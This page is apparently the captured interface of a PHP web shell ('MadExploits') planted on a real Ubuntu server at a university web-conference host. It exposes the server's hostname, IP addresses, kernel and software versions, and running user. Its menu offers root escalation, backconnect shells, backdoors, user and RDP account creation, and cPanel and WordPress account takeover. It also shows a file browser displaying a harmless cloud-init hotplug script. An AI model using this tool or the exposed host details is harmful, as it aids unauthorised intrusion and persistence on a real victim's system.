Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.223.210.196
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
cloud-init /
[ HOME SHELL ]
Name
Size
Permission
Action
ds-identify
54.55
KB
-rwxr-xr-x
hook-hotplug
610
B
-rwxr-xr-x
uncloud-init
4.02
KB
-rwxr-xr-x
write-ssh-key-fingerprints
1.92
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hook-hotplug
#!/bin/bash # This file is part of cloud-init. See LICENSE file for license information. # This script checks if cloud-init has hotplug hooked and if # cloud-init has finished; if so invoke cloud-init hotplug-hook is_finished() { [ -e /run/cloud-init/result.json ] } if is_finished; then # open cloud-init's hotplug-hook fifo rw exec 3<>/run/cloud-init/hook-hotplug-cmd env_params=( --subsystem="${SUBSYSTEM}" handle --devpath="${DEVPATH}" --udevaction="${ACTION}" ) # write params to cloud-init's hotplug-hook fifo echo "${env_params[@]}" >&3 fi
Close